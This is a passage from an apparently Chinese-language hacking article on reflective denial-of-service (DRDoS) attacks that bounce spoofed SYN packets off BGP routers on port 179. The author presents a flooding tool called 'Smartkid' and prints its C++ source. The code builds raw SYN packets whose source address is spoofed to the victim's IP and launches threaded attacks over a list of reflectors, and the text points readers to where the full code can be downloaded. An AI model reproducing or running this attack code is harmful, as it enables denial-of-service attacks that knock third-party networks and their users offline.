当被害者被多个网络核心基础设施路由器攻击，所有的连接都是完全合法的SYN/ACK连接回应包，它们显示了一个TCP源端口：179。BGP是中介路由器支持的“边界网关协议”(Border Gateway Protocol)。路由器使用BGP与它们的邻居进行即时的信息交流来交换它们的路由表，这是为了通知它们彼此路由器可以在哪个IP范围内进行转交。BGP的细节并不重要， 每个良好连接的中介器都会接受它们179端口上的连接。也就是说，任何一个SYN数据包到达一个网络路由器上后，都会引出一个该路由的SYN/ACK回应包来，从而利用BGP的特性实现反射放大洪水攻击。

　　DRDoS与DDoS的不同之处就是不需要在实际攻击之前占领大量的傀儡机，发动DRDoS也只需花费攻击者很少的资源。这种攻击也是在伪造数据包源地址的情况下进行的，从这一点上来说，与Smurf攻击一样;而DRDoS是可以在广域网上进行的，其名称中的“R”意为反射，就是这种攻击行为最大的特点。

　　代码实现

　　为了实现DRDoS，我专门写了一个强大的综合利用工具Smartkid，实现了以下几个功能：多线程端口扫描、多线程DDoS攻击、多线程DRDoS攻击、ICMP洪水、SYN洪水、自动更新。这款工具已经开放了源代码，大家可以到www.dream2fly.net和www.xfocus.net下载，我随本文也提供了完整源代码。下面我主要根据代码来讲解一下DRDoS的实现原理，为了层次清楚，我删去了ICMP攻击部分，大家可以参看源代码。

　　1)首先是初始化要发送的SYN数据报首部，这样攻击线程可以只需要修改少许参数，就能达到加快攻击速度的目的，具体实现代码如下所示。

void CDrdos::InitSynPacket() 　　{     //填充IP首部        memset((void *)&ipheader,0,sizeof(ipheader));        ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));         ipheader.tos=0;         ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));         ipheader.ident=1;         ipheader.frag_and_flags=0x40;          ipheader.ttl=255;            //最大        ipheader.proto=IPPROTO_TCP;         ipheader.checksum=0;         ipheader.sourceIP=inet_addr(m_target_ip);        ipheader.destIP=inet_addr(m_target_ip);        //填充TCP首部        memset((void *)&tcpheader,0,sizeof(tcpheader));        tcpheader.th_dport=htons(m_target_port);         tcpheader.th_sport=htons(m_target_port);         tcpheader.th_seq=htonl(rand());         tcpheader.th_ack=0;         tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);         tcpheader.th_flag=2;        //syn 00000010，修改这里来实现不同的标志位探测，是SYN、是FIN，还是ACK探测        tcpheader.th_win=htons(512);         tcpheader.th_urp=0;         tcpheader.th_sum=0;         //填充TCP伪首部，用来计算TCP头部的效验和        memset((void *)&psdheader,0,sizeof(psdheader));        psdheader.saddr=ipheader.sourceIP;         psdheader.daddr=ipheader.destIP;         psdheader.mbz=0;         psdheader.ptcl=IPPROTO_TCP;         psdheader.tcpl=htons(sizeof(TCP_HEADER)); 　　}

　　2)在开始攻击函数start_drdos中启动一个drdosthread攻击线程：AfxBeginThread(drdosthread,NULL)，实现UI层和业务层面的分离，从而提高UI反应速度。

void CDrdos::start_drdos(const vector<CString> &reflect_list) { m_listCounter=0; m_ncounter=0; m_pDlg=(CsmartkidDlg*)AfxGetApp()->GetMainWnd(); m_threadnum=m_pDlg->m_threadnum; strcpy(m_target_ip,m_pDlg->m_targetip.GetBuffer()); m_target_port=m_pDlg->m_drdosport; m_reflectlist=reflect_list;  //开始初始化数据包 InitSynPacket(); m_mainnum=m_reflectlist.size()/m_threadnum; if(m_reflectlist.size()%m_threadnum > 0) {   m_mainnum++; }   m_pDlg->m_prog->SetRange(0,m_reflectlist.size()); m_pDlg->m_prog->SetStep(1); AfxBeginThread(drdosthread,NULL); }